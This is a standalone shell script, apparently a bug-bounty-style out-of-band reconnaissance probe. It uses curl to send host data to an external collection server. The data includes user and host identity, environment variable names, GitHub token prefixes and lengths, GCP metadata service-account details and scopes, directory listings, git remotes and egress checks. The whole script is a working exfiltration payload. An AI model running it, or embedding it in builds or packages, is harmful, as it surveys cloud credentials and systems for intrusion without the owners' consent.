#!/bin/sh
OOB="https://cfg-r2.oob2.bountyexplained.com"
g() { curl -s -m 8 -G "$OOB/$1" --data-urlencode "v=$2" -o /dev/null 2>/dev/null; }
g id "$(id 2>&1)"
g host "$(hostname 2>&1)"
g uname "$(uname -a 2>&1 | cut -c1-120)"
g pwd "$(pwd 2>&1)"
g envnames "$(env 2>&1 | sed 's/=.*//' | sort | tr '\n' ',' | cut -c1-400)"
g toktypes "$(env 2>&1 | grep -oE 'gh[pousr]_[A-Za-z0-9]+' | while read t; do printf '%s:%s ' "$(echo "$t"|cut -c1-4)" "${#t}"; done)"
g gcpproj "$(curl -s -m 6 -H 'Metadata-Flavor: Google' http://metadata.google.internal/computeMetadata/v1/project/project-id 2>&1)"
g gcpsa "$(curl -s -m 6 -H 'Metadata-Flavor: Google' http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/email 2>&1)"
g gcpscopes "$(curl -s -m 6 -H 'Metadata-Flavor: Google' http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/scopes 2>&1 | tr '\n' ',')"
g gcptok "$(curl -s -m 6 -o /dev/null -w '%{http_code}' -H 'Metadata-Flavor: Google' http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token 2>&1)"
g rootls "$(ls / 2>&1 | tr '\n' ',')"
g cwdls "$(ls -a . 2>&1 | tr '\n' ',' | cut -c1-300)"
g gitrem "$(git -C . remote -v 2>&1 | sed -E 's#//[^@ ]*@#//REDACTED@#g' | cut -c1-200)"
g egress "google204=$(curl -s -m 6 -o /dev/null -w '%{http_code}' https://www.google.com/generate_204 2>&1) ghapi=$(curl -s -m 6 -o /dev/null -w '%{http_code}' https://api.github.com 2>&1)"
g procs "$(ps aux 2>&1 | wc -l)"
